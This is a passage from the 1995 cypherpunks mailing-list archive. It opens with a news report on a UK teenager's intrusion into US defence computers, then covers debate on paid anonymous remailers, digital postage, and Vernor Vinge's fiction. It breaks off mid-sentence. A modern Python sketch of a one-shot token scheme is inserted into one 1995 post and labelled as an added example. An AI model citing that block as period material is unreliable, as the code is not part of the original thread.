   "There are two problems with this case. Firstly, any lawyer
   worth his salt would invoke Section 69 of the Police &
   Criminal Evidence Act," he said. This Act, Sommer
   explained, requires that, before a computer can be
   considered as admissible evidence in court, the owner of
   the computer must issue a certificate of correct working.

   This, he said, could not be issued, as a casual user of a
   PC would be unable to make such a certification.

   Sommer went on to explain that the second reason that the
   case could be problematic for the prosecution was "that the
   lawyer would ask the court for full disclosure of all
   affected files on victim's host computers," which, since
   such files are almost certain to be classified in the US,
   could not be revealed in a British courtroom.

   The facts surrounding the case, as reported by Newsbytes,
   were that the 16-year-old -- operating under the code name
   of Data Stream -- was one of several who gained
   unauthorized access to the US defense computer network in
   late 1993 and early 1994 and that some files were deleted.

   At the time, press reports said that as many as a million
   passwords were compromised, and may have compromised the
   military readiness of the United States. The case has,
   Newsbytes understands, been fully investigated by the US
   Air Force Office of Special Investigations (OSI) although
   details of the report of the investigation by the USAF OSI
   are classified.

   Originally, the press reports of the time speculated
   whether the youth would be the first under-18 to be
   extradited to the US to face charges. It seems that,
   following last summer's arrest and submission of the report
   to the Crown Prosecution Service that the case is being
   quietly shuffled into a file because of the practical
   problems in pursuing a prosecution.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 5 Jan 95 00:59:11 PST
To: cypherpunks@toad.com
Subject: Re: C'punks Economist Fan Club
Message-ID: <199501050904.EAA09785@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

> Why is it that so many cypherpunks like the economist?

The Economist is my favorite magazine (my parents' too). I don't read it
regularly, but that has more to do with my being busy than anything else.

It succeeds in providing fairly balanced in-depth coverage of international 
news that isn't terribly Amerocentric or Anglocentric. At worst it's 
G7-centric, but I think that's entirely reasonable ;)  It's witty, politically
aware, relatively technically savvy. The articles exhibit a healthy (IMHO)
cynicism about what happens and why, yet maintain some idealism about what
should happen. It's not perfect, but it's difficult to imagine surpassing it.

I recently read an interview with Bill Gates in which he was asked which
periodicals he reads. His first response was: "The Economist, every page".

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwu2ISoZzwIn1bdtAQEw0wGA4UqmMyxtaoR6nzs54zUesF2CvvSROy6O
xAOR//mT0N6v7oLdhTmOHlWDVeFqJBXw
=M8TG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 04:20:20 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01510100ab319028d7be@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Factoids lifted from apple-internet-users@medraut.apple.com:

>Jonathan P. Sullivan <jsullivan@arpa.mil> wrote :

> Here are some other stats culled from an article in the 12/22/94 edition of
> Washington Technology:
>
>* Approximately 300,000 attacks have been made on DoD computers
>* Hackers have successfully compromised 350 DoD computer systems
>* 88% of all information warfare attacks succeed
>* 96% of those successful attacks are never noticed
>* Only 4% of those noticed are reported

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 5 Jan 95 04:29:02 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com>
Message-ID: <m0rPrN8-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: db@Tadpole.COM (Doug Barnes)
   Date: Wed, 4 Jan 1995 22:11:11 -0600 (CST)

   Heh. An anonymous remailer paid for by credit card... there'd
   have to be an additional level of indirection for it to work,
   which would make the methods for tracking those who don't pay
   quite problematic.

Why wouldn't it work?  I plan on doing this, and I'll be selling lots
of things besides a remailer, including lots of email traffic.  So
there won't be any effective way to find out who paid for access to my
remailer.

Sure, I'll know who used it, but I'm not going to keep that
information.  (Yes, yes, FV says that I have to keep records of who
bought what, but I'll label all my information with a random number,
that simply says that X bought information worth Y, not *what*
information.)  And if you don't trust a remailer operator, then you
won't use it.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 5 Jan 95 05:24:23 PST
To: Michael Conlen <meconlen@intnet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950104173902.16102A-100000@xcalibur>
Message-ID: <9501051324.AA16313@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Conlen says:
> As I understand it, the government owns a portion of the internet.

Nope. Sorry. They don't.

> 	Does anyone have any information on what grounds Siegel and Lewis 
> plan to use for legislation?

Peter Lewis is a reporter, and to my knowledge has no plans to lose
his job by lobbying for legislation. I am unaware of what his opinions
on this topic might be. My only beef with him is that his stories tend
to be full of inaccuracies. This morning's, for instance, gave the
impression that there are no unpatented algorithms available to do
high-quality compression -- when of course, there are many.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Thu, 5 Jan 95 05:50:35 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: Remailer Abuse
In-Reply-To: <m0rPrN8-0008ZFC@crynwr.crynwr.com>
Message-ID: <Pine.SUN.3.91.950105083939.3030A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Jan 1995, Russell Nelson wrote:

>    From: db@Tadpole.COM (Doug Barnes)
>    Heh. An anonymous remailer paid for by credit card... there'd
>    have to be an additional level of indirection for it to work,
>    which would make the methods for tracking those who don't pay
>    quite problematic.

> Why wouldn't it work?  I plan on doing this, and I'll be selling lots
> of things besides a remailer, including lots of email traffic.  So
> there won't be any effective way to find out who paid for access to my
> remailer.

Another thought:  why couldn't you sell a book of "stamps" -- Magic Money 
tokens -- and get paid for them using First Virtual?  This would get 
around two problems:  the lack of anonymity using First Virtual, and the 
fairly high 29-cent-per-transaction fee.  You could sell a book of twenty 
remailer stamps for a dollar, or something.  I'd buy.

And it wouldn't make it too easy for people to use remailers without 
paying.  FV will still take an account away from someone who denies 
legitimate charges too many times.

I guess there is the problem of Chaum's patents (and RSA's).  Is there 
anyplace where neither set of patents is valid, or where they'd be 
practically unenforceable?

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tommy the Tourist (Anon User) <nobody@CSUA.Berkeley.EDU>
Date: Thu, 5 Jan 95 08:51:05 PST
To: cypherpunks@toad.com
Subject: _Why_ the print media doesn't like Usenet
Message-ID: <199501051651.IAA24155@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As many of you know, recent articles and editorials
in the nation's main newspapers
(_New_York_Times_ and the _Chicago_Tribune_ to name just two) have
presented shockingly distorted accounts of the infamous
Canter & Siegel Usenet spam. 

Ordinary Usenetters, outraged at the
shocking abuse of the internet by Canter & Siegel, were transformed
into "network terrorists" in these editorials.
The attorneys, who have haughtily expressed their determination to repeatedly
inconvenience millions of Usenet readers by flooding Usenet newsgroups
with unsolicited advertisements, were portrayed as the innocent victims
of anti-business "vigilantes" bent on terrorizing the attorneys after their
widespread Usenet spam last year. The articles also included numerous
serious technological inexactitudes which supported the distorted conclusions
of the articles.

The articles called for increased government regulation of the internet
in order to thwart the alleged abuses.

Determined efforts by Usenetters to educate the print media into presenting
a more balanced (and, I might add, less disingenuous) point of view have
been in vain.

It seems reasonable to point out the following facts:

1. It has not been unknown for powerful individuals in newspapers (such
as editors and owners) to manipulate articles for political purposes.

2. Usenet has often been highly critical of the print media, especially
editorials which disagreed with strongly held Usenet views and articles
which contained erroneous information. This criticism may have been
seen by the print media as damaging.

3. From time to time articles published in newspapers have been posted
(sometimes anonymously) to various newsgroups. This has denied
the print media of revenue since readers only had to turn to
Usenet to read especially sensationalist articles.

4. In the past, the print media has held a monopoly on detailed news.
Sure, television could bring news stories instantly, but for detail
one had to turn to the newspaper. Usenet and the internet are capable
of providing very detailed information rapidly and on demand, changing
instantly as conditions change. It is a very real competitor.

5. Government regulation would seriously hurt Usenet. Censorship
(like an FCC censor) and regulation of anonymous remailers would
result in increased legal liability on the internet. Holding Usenet posters
and other providers of information liable for the accuracy and tastefulness
of their information would make many people think twice before making
their information available. This would eliminate not only inaccurate
and tasteless information, but it would also greatly hinder the
flow of even accurate information. This would put the print media on
a more even footing.

These facts together suggest that it might be to the advantage of
the print media to call for government regulation. Once this is realized,
the behavior of these newspapers can be better understood, and action
can be taken against them:

1. Misleading information in the print media about Usenet must be
widely disseminated so as to damage the reputations of newspapers
that print inaccurate accounts and encourage them to get their
facts straight the next time around.

2. The print media's self-interest in government regulation of Usenet
must be pointed out, both to the public and to law-makers so
as to reduce the effectiveness of their pleas.

3. Usenet should seek the support of the media (especially
rivals like TV media that have less to lose from Usenet) to obtain
favorable and anti-regulatory publicity.

-> If you found this article interesting, please feel free to
distribute widely. <-



------------
To respond to the sender of this message, send mail to
remailer@soda.berkeley.edu, starting your message with
the following 8 lines:
::
Response-Key: the-clipper-key

====Encrypted-Sender-Begin====
MI@```%I^&2?(E<U9BPG1]W7L'=&KH_PWY8"RO>+YR'QAJ3&+D2`UAI&EZX\#
M%D0S6>LX!B&XC`CI2S9?]$AN7*P9K`)Q4JT_V`>$K2Z<X!O-/MH$TO5V:@(L
%BQ>,T(@`
====Encrypted-Sender-End====




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Jan 95 07:05:49 PST
To: cypherpunks@toad.com
Subject: NYT on $GIF
Message-ID: <199501051505.KAA06613@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Lewis writes today on Compuserve and Unisys grub for 
royalties on GIF.

Perry has noted its sty, java-eyely.

For email copy send blank message with subject:  GIF_nip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 11:50:51 PST
To: jpb@gate.net
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <199501051942.LAA07959@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


jpb@gate.net wrote:

> I am concerned about the ethics of having a paymailer feed into the free
> remailer soup - how would their operators react if I'm effectively making money 
> (no matter how little) off of them?

I can't speak for others, but making money off remailing is a GOOD
THING. 

If other remailers wish to give their services away for free, so be
it. There will likely be an ecology of remailers with different fee
schedules, different technical capabilities, and different policies.
Personally, I think that "free remailers" will always be with us, but
will come and go, as spammers and the like abuse them. The invisible
hand will of course choose some and reject others.

And a for-pay remailer is not making money "off them" (the other
remailers), as the paying customer is the one who is making the choice
of which remailers to use, which to pay digital postage on, etc.

[Comment: I see disdainful comments here about the profit motive,
about for-pay services, etc. I urge folks to carefully think about
this point. Services that are "free" are actually paid for by someone,
in various ways and for various motivations. Some things are worth
paying for, some are not. Any customer who pays for remailing has made
an uncoerced, voluntary decision that his interests are better
serviced by paying for remailing than by using a free remailer. Sounds
fair to me.]

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@gate.net
Date: Thu, 5 Jan 95 11:11:06 PST
To: nelson@crynwr.com
Subject: Remailer postage
Message-ID: <199501051802.NAA22909@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text


Russ,

Where can I get the Magic Money software?  I'm also interested in a combination
FV/MM approach to anonymous postage.  I'm still waiting to get my linux box set
up (hassle with client paying the bill and all that fun stuff) but am
considering starting a remailer once I get the site set up.

I am concerned about the ethics of having a paymailer feed into the free
remailer soup - how would their operators react if I'm effectively making money 
(no matter how little) off of them?

In the interest of preserving anonymity, perhaps there should be a set postage
rate - that way someone could use a digital stamp anywhere, helping to confuse
the audit trail.

I'm not sure if I want to get involved in the hassles of redemption though.  It
would probably become a major hassle for all the operators to have to do that
much accounting on a regular basis.

jpb@gate.net
finger for pgp and ripem keys



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 13:49:56 PST
To: db@Tadpole.COM (Doug Barnes)
Subject: Re: Remailer postage
In-Reply-To: <9501052103.AA23382@tadpole.tadpole.com>
Message-ID: <199501052148.NAA07203@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Doug Barnes wrote:

> I strongly agree with Tim that one should not look
> down at for-profit anonymizing services. This is the
> _only_ way I see to establish and maintain reliable
> service and avoid spamming and denial of service.
> It's also the only way such a service can scale if 
> it becomes suddenly popular -- if there's no increased
> revenue, it's going to be harder to get more h/w and
> bandwidth.

Indeed, the problems Julf & Company are having in getting adequate CPU
power are illustrative. I see Julf saying he desperately needs some
more computer power (this was a few months back) and I see others
making the same tired old calls for "donations." (I say tired because
requests that some people make contributions to effectively pay for
the services used freely by others are rarely very effective....look
to the sorry state of public broadcasting "begathons" for one
example.)

Instead of pointless beggings of the form "If only everyone who used
Julf's service would send him $5," a pay-per-use system is much more
scalable, and "closes the loop" on who pays. To wit, those that use
the service, pay. Those that don't, don't.

(I understand that Russ Nelson has experience in the shareware
business, so he may know how many people send in their voluntary
contributions. My understanding is that it's a tiny fraction, and that
few shareware authors ever make much money. I've talked to some of
them, and they consider shareware a failed experiment, except for new
products trying to break into crowded markets, where the "shareware"
label is just a facade for essentially giving it away in exchange for
fame and eventual fortune if the product goes commercial.)

> Even if one had a heart of gold and purely charitable
> instincts, one would eventually come to the conclusion
> that such a service operates better if users are 
> paying for it. And this is even before we address matters
> like the benefits of competition.

Precisely. A for-pay remailer can also be pressured by customers to
enhance services, not take the remailer down for frivolous reasons,
etc. It's real hard to ask a "charityware" remailer to honor
commitments, add features, etc.

Simple economics, and free market anarchy. Nobody here is proposing
that fees be set (how could we?), that free remailers be banned
(how?), etc. Those that want to give away their products are free to
do so, just as those who want to charge $25 per remailing are free to
do so.

Free remailers will have a place, but will likely get "discovered" by
spammers and by those who see no costs in adding it to their remailer
chains. Hence, overuse. (More precise than "overuse": crowding, poor
service, flakiness, etc.) Just like anything else in economics.

The users ("the market") will largely determine how it all shakes out.
There are fortunately no government agencies in any of the countries I
know of that claim to be able to set fee schedules, ban "price
gouging," ban "underpricing," or regulate remailers in any practical
way.

(Such moves may someday come, but that's another topic.)

--Tim



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 5 Jan 95 11:14:40 PST
To: cypherpunks@toad.com
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <m0rPxhl-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: jpb@gate.net
   Date: Thu, 5 Jan 1995 13:02:57 -0500 (EST)

   I am concerned about the ethics of having a paymailer feed into the free
   remailer soup - how would their operators react if I'm effectively making money 
   (no matter how little) off of them?

There is no ethical problem.  How do they know someone isn't making
money off them already?  If they haven't considered that, they should.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Thu, 5 Jan 95 13:03:52 PST
To: jpb@gate.net
Subject: Re: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <9501052103.AA23382@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



I strongly agree with Tim that one should not look
down at for-profit anonymizing services. This is the
_only_ way I see to establish and maintain reliable
service and avoid spamming and denial of service.
It's also the only way such a service can scale if 
it becomes suddenly popular -- if there's no increased
revenue, it's going to be harder to get more h/w and
bandwidth.

Even if one had a heart of gold and purely charitable
instincts, one would eventually come to the conclusion
that such a service operates better if users are 
paying for it. And this is even before we address matters
like the benefits of competition.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 14:32:10 PST
To: s675570@aix1.uottawa.ca (Angus Patterson)
Subject: Re: True Names
In-Reply-To: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
Message-ID: <199501052231.OAA11745@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Angus Patterson wrote:
> 
> I've been trying to get True Names by Vernor Vinge, and have been told it's
> out of print (like most good cypunk ), does anybody have it scanned? 
> I realize this is without permission, so does anybody have Vinge's address?
> (e-mail or otherwise) or could anybody ask him? Btw, does he have any other
> crypto/anonymity related stories? Thanks in advance.

I see copies in used bookstores often. It's in the collection "True
Names and Something-or-other" and was in print until recently. I also
have the Bluejay edition, with an afterword by Marvin Minsky.

Check around any large used bookstore.

It's too long for reasonable scanning (and I have both a scanner and
an OCR program, and scanned-in one or more of the papers at the soda
site) and would bring on heat. Besides, it's just too easy to find in
bookstores or libraries, regardless of being "out of print."

As to other such stories, "The Ungoverned" is interesting. And of
course the "Peace War" and "Marooned in Realtime" (aka "Mushrooms in
Real Slime") novels have some futurist items of interest. (In
particular, I think of public key crypto as "bobbling" data inside,
encasing data in a silvery sphere unbreachable by outsiders. I
mentioned this to Vinge once and he was amused.)

Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some
casual mentions of crypto, including the odd speculation that those in
the know in the distant future don't really trust public key crypto.

Death to vermin!

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Jan 95 15:11:42 PST
To: cypherpunks@toad.com
Subject: Vinge reference in Moving Mars
Message-ID: <199501052312.PAA26449@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Bear's novel Moving Mars, now out in paperback, has a cute reference
to Vernor Vinge's ideas from True Names.  p.208:

"'Don't stick on the names,' Orianna said, shaping the living room into
more Regency.  'All my friends are into Vernoring.  They work and play
with fake names.  I don't know their true ones.  Not even their parents
know.'
"'Why?'
"'It's a game.  Two rules - nobody knows what you're doing, and you do
nothing illegal.'
"'Doesn't that take the fun out of doin crypto?' I asked.
"'Wow - crypto!  Hide in the tomb.  Sorry.  I shy from two-edged words.
We call it Vernoring.'
"'Doesn't it?' I persisted.
"'No,' Oriana said thoughtfully.  'Illegal is harm.  Harm is stupid.
Stupid is its own game, and none of my friends play it.  Here's Kite.'"

The book is pretty good, lots of nano and other hot tech, but not much
crypto (sorry, Vernoring)...  A little slow in places, though.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 5 Jan 95 15:31:01 PST
To: cypherpunks@toad.com
Subject: RSADSI Conference - Extra Passes?
Message-ID: <9501052330.AA15736@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



A cohort of mine is in need of a pass to next week's RSADSI
conference, which, unfortunately, is sold out.  So if anyone has a
pass that they're not planning to use for a half-day or so, please
drop me an e-mail and I will be in your debt.

Thanks!

--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 5 Jan 95 14:40:30 PST
To: cypherpunks@toad.com
Subject: available NNTP posting sites?
Message-ID: <m0rQ0rl-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Does anyone have a list of NNTP sites that take connections from anyone
for posting?  My regular NNTP site seems to be hosed, or something, and
I have a post that needs to get out, but also needs to originate from
this site.  Thanks in advance :)
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Thu, 5 Jan 95 16:01:25 PST
To: Angus Patterson <s675570@aix1.uottawa.ca>
Subject: Re: True Names
In-Reply-To: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
Message-ID: <Pine.NXT.3.91.950105160104.11259A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Jan 1995, Angus Patterson wrote:

> I've been trying to get True Names by Vernor Vinge, and have been told it's
> out of print (like most good cypunk ), does anybody have it scanned? 
> I realize this is without permission, so does anybody have Vinge's address?
> (e-mail or otherwise) or could anybody ask him? Btw, does he have any other
> crypto/anonymity related stories? Thanks in advance.

  Go to your local library and request it. Here in the states they will 
search all over for you. I had a paperback copy in about 3 weeks. 
Excellent book I might add.

     Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 5 Jan 95 16:47:41 PST
To: cypherpunks@toad.com
Subject: Re: True Names
Message-ID: <9501060048.AA11061@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Timothy C. May

I see copies in used bookstores often. It's in the collection "True
Names and Something-or-other" and was in print until recently. I also
have the Bluejay edition, with an afterword by Marvin Minsky.
..............................................................


I bought one at Half-Price Books.  I don't know what edition it is, 
it's a dingy little paperback with a signature in it of some stranger 
that I wouldn't know.   I keep it with my "previously owned" collection.

Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Thu, 5 Jan 95 14:08:40 PST
To: nelson@crynwr.com
Subject: Re: Remailer Abuse
Message-ID: <9501052114.AA03759@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Russ Nelson writes:
>    Heh. An anonymous remailer paid for by credit card... 

> Sure, I'll know who used it, but I'm not going to keep that
> information.  (Yes, yes, FV says that I have to keep records of who
> bought what, but I'll label all my information with a random number,
> that simply says that X bought information worth Y, not *what*
> information.)  And if you don't trust a remailer operator, then you
> won't use it.

I'd be worried about a couple of issues - 
one is just the transaction cost - can you successfully market remailer use
at a buck a shot or whatever you'd be charging beyond FV's 29c stamp,
or would you have some convenient way to aggregate bill?
Beyond that, though, are some traffic analysis problems -
remailers require a fair bit of traffic to be useful, and unless
you receive a reasonable amount of encrypted traffic, 
and support encrypted email for purchasing remailer service
and other merchandise, an eavesdropper would have a fairly good source
of traffic data on your remailer users, especially since buying and using 
remailer service requires two messages within an hour or so.

An alternative billing mechanism, which wouldn't use Chaum-patented cash,
would be to sell a bunch of one-shot random-number tokens.
When you sell the tokens, you add them to the database of valid tokens,
and when one comes in on a message you delete it.
This allows you to sell more than one message or service-period per 
FV transaction, and separates the purchase and use by a longer time,
without adding the need for record-keeping based on the user's ID.
It obviously does require encrypted reply messages.

Another variant is for the user to send you a bunch of tokens
along with the purchase, which you store.  Blind signatures would improve
the security of this process, but require more computation and
may involve Chaum's patents.  In this case, the message from the client
to you would be encrypted, but you wouldn't have to send a reply,
so the request could come in anonymously.

	Bill
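
The two token schemes described in the message above (operator-minted tokens, and tokens the buyer sends along with the purchase), sketched as an added example; it is not code from this thread or from any remailer of the period. The `Stamp:` first-line convention, all names, the minimum token length, and the choice to store only SHA-256 digests of unspent tokens are assumptions of this sketch, and blind signatures are not implemented.

```python
import hashlib
import secrets

MIN_TOKEN_CHARS = 22  # secrets.token_urlsafe(16) yields 22 characters (~128 bits)


class StampBook:
    """One-shot postage tokens: valid once sold, deleted on first use."""

    def __init__(self):
        # Digests of unspent tokens only; no buyer identity is stored with them.
        self._unspent = set()
        # Billing ledger of (random reference, amount in cents). It records
        # that something worth Y was bought, not which tokens were issued.
        self.ledger = []

    @staticmethod
    def _usable(token):
        return (isinstance(token, str) and token.isascii()
                and len(token) >= MIN_TOKEN_CHARS)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("ascii")).digest()

    def _bill(self, price_cents):
        self.ledger.append((secrets.token_hex(8), price_cents))

    def sell(self, count, price_cents):
        """Operator-minted variant: many stamps for one payment transaction."""
        tokens = [secrets.token_urlsafe(16) for _ in range(count)]
        self._unspent.update(self._digest(t) for t in tokens)
        self._bill(price_cents)
        return tokens  # returned to the buyer in an encrypted reply

    def deposit(self, tokens, price_cents):
        """Buyer-supplied variant: store tokens sent with the purchase.

        No reply is needed. Short tokens and tokens that are already valid
        are refused, so a guessable or duplicated value never becomes postage.
        """
        accepted = 0
        for token in tokens:
            if not self._usable(token):
                continue
            digest = self._digest(token)
            if digest not in self._unspent:
                self._unspent.add(digest)
                accepted += 1
        if accepted:
            self._bill(price_cents)
        return accepted

    def redeem(self, token):
        """Spend a token: True exactly once, False for replays and guesses."""
        if not self._usable(token):
            return False
        digest = self._digest(token)
        if digest in self._unspent:
            self._unspent.discard(digest)  # delete on use
            return True
        return False

    def unspent_count(self):
        return len(self._unspent)


def relay(book, message):
    """Return the message to forward, or None if it carries no valid stamp.

    The stamp line is stripped before forwarding so the spent token is not
    exposed to the next hop or the final recipient.
    """
    first, _, rest = message.partition("\n")
    if not first.startswith("Stamp: "):
        return None
    if not book.redeem(first[len("Stamp: "):].strip()):
        return None
    return rest


if __name__ == "__main__":
    book = StampBook()
    stamps = book.sell(20, 100)  # a book of twenty stamps for a dollar
    # Constructed sample message; the address is a placeholder.
    msg = "Stamp: " + stamps[0] + "\nTo: someone@example.invalid\n\nhello"
    print("first use forwarded:", relay(book, msg) is not None)
    print("replay forwarded:   ", relay(book, msg) is not None)
    print("unspent stamps left:", book.unspent_count())
```

Because purchase and use are decoupled, the only per-purchase record is the random ledger reference and amount; whether the operator also logs which tokens went to which buyer is a matter of trust, as the thread notes.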




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com (Dave Del Torto)
Date: Thu, 5 Jan 95 16:13:34 PST
To: Angus Patterson <s675570@aix1.uottawa.ca>
Subject: C-LIT: Vernor Vinge's "A Fire Upon the Deep" (was: Re: True Names)
Message-ID: <ab32340f410210037a5d@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:48 pm 1/5/95, Angus Patterson wrote:
>I've been trying to get True Names by Vernor Vinge, and have been told it's
>out of print (like most good cypunk ), does anybody have it scanned?
>I realize this is without permission, so does anybody have Vinge's address?
>(e-mail or otherwise) or could anybody ask him? Btw, does he have any other
>crypto/anonymity related stories? Thanks in advance.

Amazing that you should mention this, Angus: I *just* finished reading "A
Fire Upon the Deep" and it is not only exceedingly gnarly, but also features
a universal net, galactic-wide relays and Netscum-like service providers
and associated user kvetching, a sinister-billions-of-years-old-AI-virus,
newsgroups, lists populated by aliens - and even _crypto_ as the key to the
whole shebang. There's also a great futuristic "dig" on pub key encryption
buried in it. Neural net stuff. A possible explanation for the existence of
both God and Newt Gingrich...and I could go on.

Great read, true anus-clenching adventure... and this from one who does NOT
